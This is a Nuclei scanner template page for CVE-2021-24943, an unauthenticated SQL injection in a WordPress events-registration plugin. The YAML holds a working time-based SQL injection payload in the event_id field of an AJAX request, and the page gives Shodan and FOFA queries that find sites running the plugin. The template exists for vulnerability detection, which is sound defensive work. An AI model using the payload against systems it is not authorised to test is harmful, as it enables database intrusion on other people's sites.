Skip to content
Nuclei Templates

Registrations for the Events Calendar < 2.7.6 - SQL Injection

ID: CVE-2021-24943

Severity: critical

Author: ritikchaddha

Tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp

Description

Section titled “Description”

The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24943


info:
  name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
  remediation: Fixed in 2.7.6
  reference:
    - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24943
    - https://wordpress.org/plugins/registrations-for-the-events-calendar/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24943
    cwe-id: CWE-89
    epss-score: 0.20551
    epss-percentile: 0.96367
    cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: roundupwp
    product: registrations_for_the_events_calendar
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
    fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
    publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
variables:
  text: "{{rand_base(5)}}"


http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com


    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(body, "Please enter the email you registered with")'
        condition: and
# digest: 4a0a0047304502203e24dbf1c47c69f360d015e707375a3aca097db66f8b9139584ace12185be339022100ffcb5bd7786349c750a771aaa4c4dbcf11f18da7b2970bebee0d15c7cf92a262:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24943.yaml"

View on Github